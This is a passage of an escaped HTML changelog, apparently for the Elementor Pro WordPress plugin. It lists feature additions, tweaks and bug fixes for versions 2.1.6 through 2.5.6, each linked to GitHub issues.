href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8008\\\">#8008<\\/a>)<\\/li>\\n<li>Fix: Theme Builder taxonomy conditions not retrieving proper results in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.5.6 - 2019-04-29<\\/h4>\\n<ul>\\n<li>Tweak: Removed <code>Shortcode<\\/code> dynamic from Image, Gallery and Media control<\\/li>\\n<li>Fix: Popup not inheriting entrance animation in responsive mode (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7809\\\">#7809<\\/a>)<\\/li>\\n<li>Fix: Terms autocomplete retrieves wrong results in Query Control<\\/li>\\n<li>Fix: Query Control Related by author glitches in edge cases<\\/li>\\n<li>Fix: Query Control using terms for Products widget<\\/li>\\n<li>Fix: Posts cards style glitch in small screens<\\/li>\\n<li>Fix: Display conditions delete icon missing in small screens<\\/li>\\n<li>Fix: Avoid rendering Menu Cart widget in WordPress native editor<\\/li>\\n<\\/ul>\\n<h4>2.5.5 - 2019-04-08<\\/h4>\\n<ul>\\n<li>Tweak: Allow text selection inside a Popup<\\/li>\\n<li>Fix: Added backwards compatibility for <code>tax_query<\\/code> in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7751\\\">#7751<\\/a>)<\\/li>\\n<li>Fix: Missing arguments for <code>widget_title<\\/code> filter (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7745\\\">#7745<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.4 - 2019-04-03<\\/h4>\\n<ul>\\n<li>Fix: Move Query from using <code>term_id<\\/code> to <code>term_taxonomy_id<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7653\\\">#7653<\\/a>)<\\/li>\\n<li>Fix: Offset manipulation hook removal in Query control<\\/li>\\n<li>Fix: Missing form field <code>ID<\\/code> in some edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7711\\\">#7711<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7660\\\">#7660<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.3 - 2019-03-31<\\/h4>\\n<ul>\\n<li>Tweak: Updated Google Calendar dynamic tag URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7673\\\">#7673<\\/a>)<\\/li>\\n<li>Fix: Missing form field names (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7651\\\">#7651<\\/a>)<\\/li>\\n<li>Fix: PHP 5.4 backward compatibility in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7633\\\">#7633<\\/a>)<\\/li>\\n<li>Fix: <code>products_deprecated<\\/code> Query Control module compatibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7654\\\">#7654<\\/a>)<\\/li>\\n<li>Fix: Changed query method from <code>term_id<\\/code> to <code>term_taxonomy_id<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7653\\\">#7653<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.2 - 2019-03-27<\\/h4>\\n<ul>\\n<li>Fix: Overwrite parent widget type in Global Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7632\\\">#7632<\\/a>)<\\/li>\\n<li>Fix: Avoid Duplicates option not working in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7635\\\">#7635<\\/a>)<\\/li>\\n<li>Fix: Manual Selection option not working in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7634\\\">#7634<\\/a>)<\\/li>\\n<li>Fix: Incorrect condition caused handlers issues inside popup<\\/li>\\n<\\/ul>\\n<h4>2.5.1 - 2019-03-26<\\/h4>\\n<ul>\\n<li>Fix: Query Control invalid call to deprecated action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7619\\\">#7619<\\/a>)<\\/li>\\n<li>Tweak: Renamed action hook from <code>elementor_pro\\/{$widget_name}\\/query\\/{$query_id}<\\/code> to <code>elementor\\/query\\/{$query_id}<\\/code><\\/li>\\n<li>Tweak: Renamed filter hook from <code>elementor_pro\\/query_control\\/get_query_args\\/current_query<\\/code> to <code>elementor\\/query\\/get_query_args\\/current_query<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.5.0 - 2019-03-26<\\/h4>\\n<ul>\\n<li>New: Introducing Motion Effects including Scrolling & Mouse effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/72\\\">#72<\\/a>)<\\/li>\\n<li>New: Introducing Related Posts for Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7306\\\">#7306<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7490\\\">#7490<\\/a>)<\\/li>\\n<li>New: Introducing Date query for Query Control<\\/li>\\n<li>New: Introducing Sticky Posts support for Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2501\\\">#2501<\\/a>)<\\/li>\\n<li>Tweak: Added option to open a Popup by a custom selector (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6871\\\">#6871<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6876\\\">#6876<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7258\\\">#7258<\\/a>)<\\/li>\\n<li>Tweak: Option to count when Popup is closed in "Show up to X times" Advanced Rule<\\/li>\\n<li>Tweak: Added full border radius control options inside Popup<\\/li>\\n<li>Tweak: Changed exit intent icon in Popups<\\/li>\\n<li>Tweak: Show only one popup in its own preview<\\/li>\\n<li>Tweak: Added responsive support to Popup entrance animation control<\\/li>\\n<li>Tweak: Conditions - Singular <code>All Pages<\\/code> string changed to <code>Pages<\\/code><\\/li>\\n<li>Tweak: Added form field shortcode support for Drip tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7000\\\">#7000<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities to Price List widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7258\\\">#7258<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Custom Attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6779\\\">#6779<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities to Flip Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6986\\\">#6986<\\/a>)<\\/li>\\n<li>Tweak: Decrease <code>z-index<\\/code> for Nav Menu (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6869\\\">#6869<\\/a>)<\\/li>\\n<li>Tweak: Changed "Scrolling Effects" section label to "Motion Effects"<\\/li>\\n<li>Tweak: Use filter <code>get_meta_viewport<\\/code> for header templates (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7043\\\">#7043<\\/a>)<\\/li>\\n<li>Tweak: use filterable <code>Util::get_public_post_types()<\\/code> in Theme Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7172\\\">#7172<\\/a>)<\\/li>\\n<li>Tweak: Added Cloudflare rocket-loader support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7443\\\">#7443<\\/a>)<\\/li>\\n<li>Tweak: Added responsive support to WC Products Columns & Rows Gap controls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6913\\\">#6913<\\/a>)<\\/li>\\n<li>Tweak: WC Menu cart "View Cart" & "Checkout" buttons styling<\\/li>\\n<li>Fix: Custom ID reset to default when dragging repeater<\\/li>\\n<li>Fix: Conflict between archive-products widget and WC customizer<\\/li>\\n<li>Fix: Add to Cart widget <code>spacing<\\/code> and <code>space-between<\\/code><\\/li>\\n<li>Fix: Library view when creating a new Header or Footer<\\/li>\\n<li>Fix: Post types labels missing on Add New Template modal<\\/li>\\n<\\/ul>\\n<h4>2.4.8 - 2019-03-11<\\/h4>\\n<ul>\\n<li>Fix: Missing query section in Products widget<\\/li>\\n<li>Fix: Missing Taxonomy controls in Products widget in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.4.7 - 2019-03-06<\\/h4>\\n<ul>\\n<li>Fix: Compatibility Global Widget with Elementor v2.5.0+<\\/li>\\n<\\/ul>\\n<h4>2.4.6 - 2019-03-04<\\/h4>\\n<ul>\\n<li>Fix: Pods gallery dynamic when empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7127\\\">#7127<\\/a>)<\\/li>\\n<li>Fix: Duplicate call for conditions screen issue<\\/li>\\n<li>Fix: Compatibility with Elementor v2.5.0<\\/li>\\n<\\/ul>\\n<h4>2.4.5 - 2019-02-18<\\/h4>\\n<ul>\\n<li>Fix: Image size issue in Testimonial Carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7058\\\">#7058<\\/a>)<\\/li>\\n<li>Fix: MailChimp groups not saved in a form integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7083\\\">#7083<\\/a>)<\\/li>\\n<li>Fix: Show popup preview only on it\'s own preview<\\/li>\\n<li>Fix: Elementor dashboard templates URL corrupted links in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.4.4 - 2019-02-11<\\/h4>\\n<ul>\\n<li>Tweak: Added ACF Date Time Picker field support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6690\\\">#6690<\\/a>)<\\/li>\\n<li>Tweak: Changed the term of <code>All Posts<\\/code> condition to <code>Posts<\\/code><\\/li>\\n<li>Fix: Added <code><IfModule><\\/code> to avoid 500 error when <code>mod-headers<\\/code> is missing (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7034\\\">#7034<\\/a>)<\\/li>\\n<li>Fix: Include post CSS deletion in Global Widget update (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6856\\\">#6856<\\/a>)<\\/li>\\n<li>Fix: <code>Textarea<\\/code> default value in Forms Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6934\\\">#6934<\\/a>)<\\/li>\\n<li>Fix: MailPoet latest version caused fatal error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6996\\\">#6996<\\/a>)<\\/li>\\n<li>Fix: Fatal Error caused by calling MailPoet deleted method<\\/li>\\n<li>Notice: MailPoet <code>Auto Confirm<\\/code> option will now default to "On"<\\/li>\\n<\\/ul>\\n<h4>2.4.3 - 2019-01-30<\\/h4>\\n<ul>\\n<li>Fix: Custom Add to Cart widget responsive alignment settings<\\/li>\\n<li>Fix: Links in Post Info widget<\\/li>\\n<li>Fix: WooCommerce <code>View Cart<\\/code> string translate<\\/li>\\n<li>Fix: Wrapper classes for header\\/footer templates (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6884\\\">#6884<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.4.2 - 2019-01-25<\\/h4>\\n<ul>\\n<li>Tweak: Added pixel units to Close Button position control in Popups<\\/li>\\n<li>Fix: Exclude error in WC Products widget<\\/li>\\n<\\/ul>\\n<h4>2.4.1 - 2019-01-24<\\/h4>\\n<ul>\\n<li>Tweak: Added CSS classes control to Popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6826\\\">#6826<\\/a>)<\\/li>\\n<li>Tweak: Added responsive image size to Testimonial Carousel widget<\\/li>\\n<li>Fix: PHP warning when Toolset Date dynamic is empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6842\\\">#6842<\\/a>)<\\/li>\\n<li>Fix: Support of exclude-ids in WC Products widget<\\/li>\\n<li>Fix: Popup close button not clickable<\\/li>\\n<li>Fix: Alignment justify issue of Add to Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6749\\\">#6749<\\/a>)<\\/li>\\n<li>Fix: Bad anchors breaks the page JS<\\/li>\\n<li>Fix: Popup overlay shown when turned off<\\/li>\\n<\\/ul>\\n<h4>2.4.0 - 2019-01-21<\\/h4>\\n<ul>\\n<li>New: Introducing Popup Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/628\\\">#628<\\/a>)<\\/li>\\n<li>New: Added <code>Popup<\\/code> Dynamic Tag<\\/li>\\n<li>New: Added <code>Popup<\\/code> forms action after submit<\\/li>\\n<li>New: Added User Info dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6322\\\">#6322<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for "Nothing Found" message<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/theme_builder\\/archive\\/escape_nothing_found_message<\\/code> Filter to avoid HTML escaping in "Nothing Found" message (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6053\\\">#6053<\\/a>)<\\/li>\\n<li>Tweak: Added <code>add_doc_to_location<\\/code> method to Allow insertion of a document to a location<\\/li>\\n<li>Fix: <code>z-index<\\/code> issue with CTA widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6486\\\">#6486<\\/a>)<\\/li>\\n<li>Fix: Hide the Post Content widget and show it only in a Single document<\\/li>\\n<li>Fix: <code>selector<\\/code> replacement in Custom CSS<\\/li>\\n<li>Fix: Apply <code>the_content<\\/code> on the real content only<\\/li>\\n<li>Fix: CSS for WC products selector (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6559\\\">#6559<\\/a>)<\\/li>\\n<li>Fix: Odnoklassniki share URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6638\\\">#6638<\\/a>)<\\/li>\\n<li>Fix: Custom link new tab in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5766\\\">#5766<\\/a>)<\\/li>\\n<li>Fix: <code>nofollow<\\/code> link in Flip Box & CTA widgets<\\/li>\\n<li>Fix: Post Terms in Post Info widget<\\/li>\\n<li>Fix: Added screen reader to some icons & buttons for better accessibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5386\\\">#5386<\\/a>)<\\/li>\\n<li>Fix: Accessibility labels in Reviews widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6630\\\">#6630<\\/a>)<\\/li>\\n<li>Fix: Link to cart page not working when WooCommerce Subscriptions is active<\\/li>\\n<li>Fix: MailChimp Selected list not showing on reloading in Form widget<\\/li>\\n<li>Fix: Sub-menu arrow position in Nav Menu widget<\\/li>\\n<li>Fix: Conflict with WP Security Audit Log plugin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6648\\\">#6648<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.3.1 - 2018-12-19<\\/h4>\\n<ul>\\n<li>Fix: Template widget search functionality (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6473\\\">#6473<\\/a>)<\\/li>\\n<li>Fix: Apply <code>the_content<\\/code> filter to post content in theme builder<\\/li>\\n<\\/ul>\\n<h4>2.3.0 - 2018-12-17<\\/h4>\\n<ul>\\n<li>New: Introducing Discord Integration for Forms (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4218\\\">#4218<\\/a>)<\\/li>\\n<li>New: Introducing Slack Integration for Forms<\\/li>\\n<li>New: Introducing MailerLite Integration for Forms (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4462\\\">#4462<\\/a>)<\\/li>\\n<li>New: Activate Elementor Pro plugin by connecting to Elementor account<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/utils\\/get_public_post_types<\\/code> filter hook (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5900\\\">#5900<\\/a>)<\\/li>\\n<li>Tweak: Added <code>loop_start<\\/code> & <code>the_content<\\/code> hooks for Post Content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6173\\\">#6173<\\/a>)<\\/li>\\n<li>Tweak: Removed Custom Attributes from Page Settings<\\/li>\\n<li>Tweak: Always add the Custom CSS control to the Advanced tab<\\/li>\\n<li>Fix: In sub Term condition false positive in edge cases<\\/li>\\n<li>Fix: ToolSet Dynamic Image fallback<\\/li>\\n<li>Fix: Style glitch with the dropdown color in Nav Menu widget<\\/li>\\n<li>Fix: Style glitch in the Conditions screen in Safari browser<\\/li>\\n<li>Fix: Ribbon in the CTA widget obscures drop down menu (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6080\\\">#6080<\\/a>)<\\/li>\\n<li>Fix: The color of label won\'t change color in Widget login<\\/li>\\n<\\/ul>\\n<h4>2.2.5 - 2018-12-11<\\/h4>\\n<ul>\\n<li>New: Add Style Tab & Custom CSS for Header & Footer Templates.<\\/li>\\n<li>Tweak: Added a better identifier for subpages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6362\\\">#6362<\\/a>)<\\/li>\\n<li>Tweak: Removed Custom Attributes from page settings<\\/li>\\n<li>Fix: Yahoo event URL date issue (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6354\\\">#6354<\\/a>)<\\/li>\\n<li>Fix: Allow timezone settings in Google event URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6354\\\">#6354<\\/a>)<\\/li>\\n<li>Fix: Avoid <code>z-index<\\/code> changes by <code>nanocss<\\/code> in build process<\\/li>\\n<li>Fix: Added missing WC upsells products CSS<\\/li>\\n<li>Fix: Nav Menu dropdown losing color on hover<\\/li>\\n<li>Fix: WC Product Add-ons CSS compatibility<\\/li>\\n<\\/ul>\\n<h4>2.2.4 - 2018-12-04<\\/h4>\\n<ul>\\n<li>Fix: Global widget not saving changes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6340\\\">#6340<\\/a>)<\\/li>\\n<li>Fix: Dynamic tags support in Blockquote widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6334\\\">#6334<\\/a>)<\\/li>\\n<li>Fix: Forms Redirect URL action when using form field values with spaces<\\/li>\\n<\\/ul>\\n<h4>2.2.3 - 2018-11-29<\\/h4>\\n<ul>\\n<li>Fix: Missing "Edit Template" in Template widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6271\\\">#6271<\\/a>)<\\/li>\\n<li>Fix: Follow menu anchors with UTF8 characters in Nav Menu<\\/li>\\n<li>Fix: Show only supported templates in Template widget<\\/li>\\n<li>Fix: Revert conflicting fix for a default order for WC archive<\\/li>\\n<\\/ul>\\n<h4>2.2.2 - 2018-11-28<\\/h4>\\n<ul>\\n<li>Fix: Lightbox dynamic tag crashes the editor<\\/li>\\n<\\/ul>\\n<h4>2.2.1 - 2018-11-28<\\/h4>\\n<ul>\\n<li>New: Added <code>ACF File<\\/code> Dynamic tag to support text controls.<\\/li>\\n<li>Tweak: Added option to hide item count bubble when cart is empty in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6223\\\">#6223<\\/a>)<\\/li>\\n<li>Tweak: Added Actions group for Lightbox and Contact URL tags<\\/li>\\n<li>Tweak: Added filter <code>elementor_pro\\/dynamic_tags\\/shortcode\\/should_escape<\\/code> to avoid escaping in Shortcode dynamic tag<\\/li>\\n<li>Tweak: MailPoet3 integration allow Subscriber to to subscribe to multiple lists<\\/li>\\n<li>Tweak: Added front-end max file size validation for upload fields<\\/li>\\n<li>Tweak: Added <code>by-author<\\/code> per Post-Type condition for theme builder<\\/li>\\n<li>Fix: Template widget panel not showing the selected template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6271\\\">#6271<\\/a>)<\\/li>\\n<li>Fix: Conflict between ACF with Safari browser on Select option in Dynamic tag<\\/li>\\n<li>Fix: Add post classes only for the Single template<\\/li>\\n<li>Fix: Set document type as not editable for unsupported document like Global widget<\\/li>\\n<li>Fix: Avoid duplicate query for current WC product query<\\/li>\\n<li>Fix: Product Archive showing oldest products instead of latest<\\/li>\\n<li>Fix: CSS reset in Posts widget using cards skin<\\/li>\\n<\\/ul>\\n<h4>2.2.0 - 2018-11-19<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/290\\\">#290<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3990\\\">#3990<\\/a>)<\\/li>\\n<li>New: Added evergreen option for Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4459\\\">#4459<\\/a>)<\\/li>\\n<li>New: Added expire actions option for Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5242\\\">#5242<\\/a>)<\\/li>\\n<li>New: Introducing Reviews widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3854\\\">#3854<\\/a>)<\\/li>\\n<li>New: Introducing Sitemap widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5594\\\">#5594<\\/a>)<\\/li>\\n<li>New: Added Request Parameter dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4934\\\">#4934<\\/a>)<\\/li>\\n<li>New: Added Shortcode dynamic tag<\\/li>\\n<li>New: Added Image and Video Lightbox dynamic tag<\\/li>\\n<li>New: Added Contact URL dynamic tag<\\/li>\\n<li>New: Added Featured Image Data dynamic tag<\\/li>\\n<li>New: Added default value to each field in the Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4268\\\">#4268<\\/a>)<\\/li>\\n<li>New: Added "Any Child Of" condition to template conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5321\\\">#5321<\\/a>)<\\/li>\\n<li>New: Added "In Child" condition to template conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5587\\\">#5587<\\/a>)<\\/li>\\n<li>Tweak: Added Form Redirect URL with form values (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2564\\\">#2564<\\/a>)<\\/li>\\n<li>Tweak: Added default post classes to template wrapper (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5959\\\">#5959<\\/a>)<\\/li>\\n<li>Tweak: Better labels for terms in Query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6092\\\">#6092<\\/a>)<\\/li>\\n<li>Tweak: Renamed "Child Of" templates condition to "Direct Child Of"<\\/li>\\n<li>Tweak: Added <code>elementor\\/theme\\/get_location_templates\\/condition_sub_id<\\/code> filter hook to allow template condition translations<\\/li>\\n<li>Tweak: Load the Template Library widget via Ajax for better performance<\\/li>\\n<li>Tweak: Added 404 page title for Page Title dynamic tag<\\/li>\\n<li>Fix: Menu Cart Toggle has # URL link (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6141\\\">#6141<\\/a>)<\\/li>\\n<li>Fix: Alignment issue in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5790\\\">#5790<\\/a>)<\\/li>\\n<li>Fix: Avoid potential security risk in forms<\\/li>\\n<li>Fix: Template By Author condition conflicts with 404 page<\\/li>\\n<li>Fix: Restored WC Product Content widget in Single Product template<\\/li>\\n<li>Fix: Theme Builder Preview URLs for date archives and 404 pages<\\/li>\\n<li>Fix: Highlight active menu anchor items only when scrolled into view<\\/li>\\n<li>Fix: Carousel Pagination Progress style to support new Swiper version<\\/li>\\n<\\/ul>\\n<h4>2.1.13 - 2018-11-12<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for new brand Finder in v2.3.0<\\/li>\\n<li>Fix: Settings conflict when there are multiple carousels in the page<\\/li>\\n<\\/ul>\\n<h4>2.1.12 - 2018-11-05<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.3<\\/li>\\n<li>Tweak: Better performance for Template Library widget<\\/li>\\n<li>Fix: Fatal error if a taxonomy used in a dynamic field is removed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6029\\\">#6029<\\/a>)<\\/li>\\n<li>Fix: Date Time dynamic tag now respect site language (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6001\\\">#6001<\\/a>)<\\/li>\\n<li>Fix: Custom CSS printed twice in the front-end<\\/li>\\n<li>Fix: ACF Image field PHP warning (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6051\\\">#6051<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.1.11 - 2018-10-22<\\/h4>\\n<ul>\\n<li>New: Added ACF local fields compatibility<\\/li>\\n<li>Tweak: Re-brand TypeKit by Adobe Fonts integration<\\/li>\\n<li>Fix: Exclude <code>is_embed<\\/code> from Singular condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5915\\\">#5915<\\/a>)<\\/li>\\n<li>Fix: Avoid conflict with Ad Blockers and Share Buttons<\\/li>\\n<li>Fix: Current date time dynamic tag now shows local time<\\/li>\\n<li>Fix: Avoid conflict with 3rd party plugins that filter the permalink<\\/li>\\n<li>Fix: Avoid PHP warning when no groups are selected for MailChimp integration<\\/li>\\n<li>Fix: Avoid PHP warning if checkbox field is empty for ACF<\\/li>\\n<li>Fix: Respect password protected for a WC single product template<\\/li>\\n<li>Fix: Respect <code>order<\\/code> settings for WC archive also without pagination<\\/li>\\n<\\/ul>\\n<h4>2.1.10 - 2018-10-09<\\/h4>\\n<ul>\\n<li>Tweak: Added responsive alignment control for Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5821\\\">#5821<\\/a>)<\\/li>\\n<li>Tweak: Added link control to Animated Headline widget<\\/li>\\n<li>Fix: Mobile nav menu jump on RTL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5711\\\">#5711<\\/a>)<\\/li>\\n<li>Fix: Responsive alignment control in Add to Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5830\\\">#5830<\\/a>)<\\/li>\\n<li>Fix: Added IE compatibility for Animated Headline widget<\\/li>\\n<li>Fix: Post Content widget is now shown only on <code>Single<\\/code> templates<\\/li>\\n<li>Fix: Query Control Pagination with offset<\\/li>\\n<\\/ul>\\n<h4>2.1.9 - 2018-09-17<\\/h4>\\n<ul>\\n<li>Tweak: Added Centered Slides option for Slideshow carousel<\\/li>\\n<li>Fix: Allow only public CPT for Manual Selection in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5091\\\">#5091<\\/a>)<\\/li>\\n<li>Fix: ACF Gallery option support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5344\\\">#5344<\\/a>)<\\/li>\\n<li>Fix: Page scrolling on resize when sticky is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5740\\\">#5740<\\/a>)<\\/li>\\n<li>Fix: Edit custom name for Global Widget in the Navigator (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5689\\\">#5689<\\/a>)<\\/li>\\n<li>Fix: Coverflow transition effect in Carousel<\\/li>\\n<li>Fix: Weird mobile behavior with Cube effect in Carousel<\\/li>\\n<li>Fix: Show the first thumbnail in the Slideshow carousel correctly<\\/li>\\n<\\/ul>\\n<h4>2.1.8 - 2018-09-12<\\/h4>\\n<ul>\\n<li>Tweak: Added styling options for WC Additional Information widget<\\/li>\\n<li>Tweak: Added styling options for \'View Cart\' link in Products widget<\\/li>\\n<li>Fix: 3rd party plugin support for WC single product template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5338\\\">#5338<\\/a>)<\\/li>\\n<li>Fix: Layout of Related Product widget with WC native style<\\/li>\\n<\\/ul>\\n<h4>2.1.7 - 2018-09-03<\\/h4>\\n<ul>\\n<li>New: WC Archive Description widget<\\/li>\\n<li>Tweak: Added blend mode to Slides widget background overlay (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5555\\\">#5555<\\/a>)<\\/li>\\n<li>Tweak: Added \'Current Subcategories\' option to Product Categories widget<\\/li>\\n<li>Fix: Added default vertical alignment in Author Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5589\\\">#5589<\\/a>)<\\/li>\\n<li>Tweak: Added more blend mode options for CTA widget<\\/li>\\n<li>Tweak: Improved plugin updater method based on WordPress version<\\/li>\\n<li>Fix: Improved IE compatibility for Posts and Portfolio widgets<\\/li>\\n<li>Fix: Added default gap for products pagination<\\/li>\\n<li>Fix: Post thumbnail flickering in Safari browser<\\/li>\\n<li>Fix: Close mobile nav menu on click only in full-width mode<\\/li>\\n<li>Fix: Added trailing slash to pagination links in Posts widget<\\/li>\\n<\\/ul>\\n<h4>2.1.6 - 2018-08-28<\\/h4>\\n<ul>\\n<li>New: WC Product Category Image widget and Dynamic tag (<a 